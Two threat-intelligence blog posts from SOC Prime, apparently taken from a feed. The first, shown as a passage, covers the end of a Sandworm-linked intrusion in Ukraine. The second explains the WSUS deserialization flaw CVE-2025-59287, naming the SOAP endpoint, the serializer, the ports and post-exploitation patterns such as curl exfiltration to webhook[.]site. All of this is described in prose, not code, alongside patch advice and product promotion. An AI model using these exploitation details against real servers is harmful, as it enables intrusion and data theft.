Two days later, a second webshell was deployed, followed by additional network reconnaissance. Activity later spread to other systems. On the second computer, adversaries searched for Symantec software, listed files, and checked for KeePass processes, indicating an attempt to access stored passwords. Subsequent actions included more memory dumps (using rdrleakdiag), reconfiguration of Windows Defender, and the execution of suspicious binaries, such as service.exe and cloud.exe, whose names resembled webshells used elsewhere in the intrusion. Another notable aspect of the intrusion was the use of a legitimate MikroTik router management tool (winbox64.exe), which the attackers placed in the Downloads folder of the affected systems. Notably, CERT-UA also reported the use of winbox64.exe in April 2024, linking it to a Sandworm campaign aimed to disrupt the information and communication technology (ICT) systems of the energy, water, and heat supply sector across 20 organizations in Ukraine. 

While defenders found no direct evidence linking the recent intrusions to Sandworm, they assumed that the operations appeared to originate from russia. The investigation further revealed the use of multiple PowerShell backdoors and suspicious executables likely representing malware, though none of these samples have yet been recovered for analysis.

Adversaries displayed deep expertise with native Windows tools, proving how a skilled operator can escalate activity and exfiltrate sensitive information, including credentials, while remaining on the network with almost no visible traces. As potential mitigation measures to reduce the risks of russian-backed attacks, defenders recommend applying the Symantec Protection Bulletin.

With the increasing attempts of russia-backed hacking collectives to compromise Ukraine and its allies, organizations should be ready to thwart such stealthy threats before they escalate into attacks. By relying on SOC Prime’s complete product suite backed by AI, automation, and real-time threat intelligence, security teams can preempt cyber-attacks of any sophistication and fortify the organization’s defenses. Exclusively for MDE customers, SOC Prime also curates a Bear Fence pack to enable automated threat hunting for APT28 and 48 more russia’s state-sponsored actors, letting teams automatically hunt for Fancy Bear and its siblings through an exclusive Attack Detective scenario using 242 hand-picked behavior rules, over 1 million IOCs, and a dynamic AI-driven TTP feed.

The post Detect russian Attacks Targeting Ukraine: Hackers Apply the Custom Sandworm-Linked Webshell and Living-off-the-Land Tactics for Persistence appeared first on SOC Prime.

Following the recent Tomcat RCE vulnerability disclosures (CVE-2025-55752 and CVE-2025-55754), researchers have identified another critical RCE flaw in Microsoft Windows Server Update Services (WSUS) systems. The vulnerability tracked as CVE-2025-59287 permits remote adversaries to execute code on affected systems and is currently leveraged in in-the-wild attacks, with a PoC exploit publicly available. 

Detect CVE-2025-59287 Exploitation Attempts

With more than 1.4 billion devices powered by Windows and millions of organizations relying on Azure and Microsoft 365, Microsoft technologies form the backbone of today’s digital world. According to the 2025 BeyondTrust Microsoft Vulnerabilities Report, a record 1,360 security vulnerabilities were reported across Microsoft products in 2024, an 11% rise compared to the previous high. This surge highlights how rapidly the attack surface continues to expand and reinforces the need for organizations to stay proactive as cyber threats evolve.

The recently identified CVE-2025-59287 vulnerability in Microsoft WSUS is a clear example of this growing trend, reminding security teams that proactive defense is essential in staying ahead of modern threats.

Register now for the SOC Prime Platform to reach an extensive collection of curated detection content and AI-native threat intelligence, helping your team outscale offensive campaigns exploiting CVE-2025-59287. Press the Explore Detections button below to immediately drill down to a relevant detection stack.

Explore Detections

For a broader range of SOC content for vulnerability exploit detection, security engineers can also apply the “CVE” tag.

All the rules are compatible with multiple SIEM, EDR, and Data Lake formats and mapped to the MITRE ATT&CK® framework. Additionally, each rule is enriched with CTI links, attack timelines, audit configurations, triage recommendations, and more relevant context.

Security engineers can also leverage Uncoder AI, an IDE and co-pilot for detection engineering. With Uncoder, defenders can instantly convert IOCs into custom hunting queries, craft detection code from raw threat reports, generate Attack Flow diagrams, enable ATT&CK tags prediction, leverage AI-driven query optimization, and translate detection content across multiple platforms. For instance, cyber defenders can generate the Attack Flow diagram based on Bitdefender’s latest research in seconds.

CVE-2025-59287 Analysis

Defenders have recently uncovered a novel campaign targeting vulnerable Windows Server Update Services (WSUS). Microsoft has released an out-of-band security update to address the new flaw behind RCE attacks that is being actively exploited in the wild, with a public PoC exploit already available.

The flaw, tracked as CVE-2025-59287 with a CVSS score of 9.8, is a critical RCE vulnerability. Although initially patched during last week’s Patch Tuesday, the vendor issued an additional update following evidence of real-world exploitation.

The flaw results from improper deserialization of untrusted data within WSUS. If exploited successfully, this vulnerability enables unauthenticated, remote adversaries to run arbitrary code with the same privileges as the compromised WSUS process. Such access can be used to establish persistence, commonly by deploying a webshell, which in turn grants the attacker full interactive remote control over the affected system. 

The vulnerability lies in the WSUS component responsible for managing client authorization and reporting, specifically within the ClientWebService web service. When the server processes a specially crafted SOAP request, typically directed to an endpoint such as SyncUpdates, it attempts to decrypt and deserialize an attacker-supplied AuthorizationCookie object using the insecure .NET BinaryFormatter.

Attackers exploit CVE-2025-59287 by embedding a malicious object chain within the serialized payload. This chain leverages legitimate constructor calls that, during deserialization, trigger the execution of arbitrary code, such as spawning a command shell or downloading additional payloads. The only prerequisite for a successful attack is network access to the vulnerable WSUS instance, which is most often reachable over ports 8530 (HTTP) or 8531 (HTTPS), though configurations using 80 or 443 are also possible.

Threat actors have been observed exploiting the vulnerability to execute commands via w3wp.exe and wsusservice.exe processes, download multi-stage payloads, conduct reconnaissance, and establish persistent C2 channels. These intrusions appear to be part of pre-ransomware campaigns, where attackers automate initial access before transitioning to manual, human-operated attacks.

Notably, several incidents have been observed using the webhook[.]site as a makeshift C2 channel. Although the service is intended for developers to capture and inspect HTTP payloads, adversaries exploit its ease of use and disposable URLs to exfiltrate command output and confirm exploitation. The traffic generated this way often appears benign due to the domain’s widespread, trusted reputation, making it useful for stealthy post-exploitation signaling.

According to Bitdefender’s technical advisory, there can be four potential attack scenarios:

• In the first one, adversaries leverage the compromised process to download two files via PowerShell for a primary payload delivery, an executable dcrsproxy.exe and a companion file (rcpkg.db). The chain shows w3wp.exe spawning cmd.exe, which runs the PowerShell download-and-execute commands. 
• In the next scenario, adversaries run whoami through the worker process and pipe the output to curl, sending the result to a webhook[.]site URL to confirm the exploit and assess privileges for follow-on actions, such as privilege escalation or lateral movement. 
• The third use case involves in-memory exfiltration, where an encoded PowerShell command is executed from the service process to run an in-memory exfiltration routine that gathers network details and posts them to a disposable webhook, thereby evading command-line detections. 
• Finally, another attack scenario involves the use of DNS beaconing. Threat actors apply the IIS process to issue DNS lookups and to download and install a malicious MSI via msiexec, then gather system or network details to establish long-term C2 persistence.

As the WSUS Server Role is not enabled by default on Windows servers, the systems without it are not vulnerable; however, enabling the role on an unpatched server introduces risk. In cases when immediately installing the October 23, 2025 out-of-band update is not possible, Microsoft recommends temporary CVE mitigations such as disabling the WSUS Server Role—though clients will stop receiving updates—or blocking inbound traffic to ports 8530 and 8531 at the host firewall to render WSUS inoperative, while stressing that applying the patch as soon as possible remains the safest course of action. 

The rising frequency and impact of vulnerability exploitation emphasize the need for proactive security measures and adherence to best cybersecurity practices to enhance an organization’s defenses. SOC Prime’s complete product suite, backed by AI, automated capabilities, and real-time CTI, serves as the future-proof solution to help organizations outscale cyber threats they anticipate most.

The post CVE-2025-59287 Detection: A Critical Unauthenticated RCE Vulnerability in Microsoft WSUS Under Active Exploitation appeared first on SOC Prime.